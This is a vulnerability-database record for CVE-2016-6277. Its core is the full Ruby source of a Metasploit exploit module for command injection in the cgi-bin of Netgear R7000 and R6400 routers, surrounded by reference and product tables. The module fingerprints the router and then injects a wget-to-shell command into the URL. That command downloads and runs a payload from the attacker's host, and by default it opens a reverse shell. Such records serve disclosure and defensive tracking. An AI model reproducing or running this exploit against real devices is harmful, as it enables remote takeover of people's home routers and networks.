ID
VAR-E-201612-0017
CVE
| cve_id: | CVE-2016-6277 | Trust: 2.3 |
EDB ID
41598
TITLE
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) - CGI remote Exploit
Trust: 0.6
DESCRIPTION
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit). CVE-2016-6277 . remote exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | netgear | model: | r7000 r6400 | scope: | eq | version: | / | Trust: 1.0 |
| vendor: | netgear | model: | r7000 and r6400 | scope: | - | version: | - | Trust: 0.6 |
| vendor: | netgear | model: | r6400 | scope: | - | version: | - | Trust: 0.5 |
| vendor: | netgear | model: | r7000 r6400 cgi-bin | scope: | eq | version: | / | Trust: 0.5 |
| vendor: | netgear | model: | r8000 1.0.3.4 1.1.2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | netgear | model: | r7000 1.0.7.2 1.1.93 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | netgear | model: | r6400 1.0.1.6 1.0.4 | scope: | - | version: | - | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => "Netgear R7000 and R6400 cgi-bin Command Injection",
'Description' => %q{
This module exploits an arbitrary command injection vulnerability in
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
},
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Author' => ['thecarterb', 'Acew0rm'],
'DefaultTarget' => 0,
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'Targets' => [
[ 'Automatic Target', { } ]
],
'References' =>
[
[ 'EDB', '40889'],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
[ 'URL', 'https://www.kb.cert.org/vuls/id/582384'],
[ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'],
[ 'CVE', '2016-6277']
],
'DisclosureDate' => 'Dec 06 2016',
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
}
))
register_options(
[
Opt::RPORT(80)
], self.class)
deregister_options('URIPATH')
end
def scrape(text, start_trig, end_trig)
text[/#{start_trig}(.*?)#{end_trig}/m, 1]
end
# Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected
def check
res = send_request_cgi({'uri'=>'/'})
if res.nil?
fail_with(Failure::Unreachable, 'Connection timed out.')
end
# Checks for the `WWW-Authenticate` header in the response
if res.headers["WWW-Authenticate"]
data = res.to_s
marker_one = "Basic realm=\"NETGEAR "
marker_two = "\""
model = scrape(data, marker_one, marker_two)
vprint_status("Router is a NETGEAR router (#{model})")
if model == 'R7000' || model == 'R6400'
print_good("Router may be vulnerable (NETGEAR #{model})")
return CheckCode::Detected
else
return CheckCode::Safe
end
else
print_error('Router is not a NETGEAR router')
return CheckCode::Safe
end
end
def exploit
return if check == CheckCode::Safe
@cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';')
send_request_cgi(
'method' => 'GET',
'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
)
end
# Return CmdStager on first request, payload on second
def on_request_uri(cli, request)
if @cmdstager
send_response(cli, @cmdstager)
@cmdstager = nil
else
super
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'cgi-bin' Command Injection (Metasploit)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | Command Injection | Trust: 1.0 |
| tag: | remote | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2016-582384 | Trust: 3.6 |
| db: | CERT/CC | id: | VU#582384 | Trust: 3.6 |
| db: | NVD | id: | CVE-2016-6277 | Trust: 2.3 |
| db: | EXPLOIT-DB | id: | 41598 | Trust: 1.6 |
| db: | EDBNET | id: | 91885 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 27299 | Trust: 0.6 |
| db: | EDBNET | id: | 91907 | Trust: 0.6 |
| db: | EDBNET | id: | 91883 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 155712 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 141585 | Trust: 0.5 |
| db: | BID | id: | 94819 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2016-6277 | Trust: 2.0 |
| url: | https://github.com/rapid7/metasploit-framework/blob/fe4f20c0cc503ff11dd241ac7bc5c5ad03c532f9/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb | Trust: 1.0 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://0day.today/exploits/27299 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/41598/ | Trust: 0.6 |
| url: | http://kb.netgear.com/000036386/cve-2016-582384 | Trust: 0.3 |
| url: | http://www.kb.cert.org/vuls/id/582384 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 94819 |
| db: | PACKETSTORM | id: | 155712 |
| db: | PACKETSTORM | id: | 141585 |
| db: | EXPLOIT-DB | id: | 41598 |
| db: | EDBNET | id: | 91885 |
| db: | EDBNET | id: | 91907 |
| db: | EDBNET | id: | 91883 |
LAST UPDATE DATE
2022-07-27T09:24:24.360000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 94819 | date: | 2017-01-12T01:04:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 94819 | date: | 2016-12-09T00:00:00 |
| db: | PACKETSTORM | id: | 155712 | date: | 2019-12-17T15:52:02 |
| db: | PACKETSTORM | id: | 141585 | date: | 2017-03-12T00:54:02 |
| db: | EXPLOIT-DB | id: | 41598 | date: | 2017-03-13T00:00:00 |
| db: | EDBNET | id: | 91885 | date: | 2017-03-14T00:00:00 |
| db: | EDBNET | id: | 91907 | date: | 2017-03-15T00:00:00 |
| db: | EDBNET | id: | 91883 | date: | 2017-03-13T00:00:00 |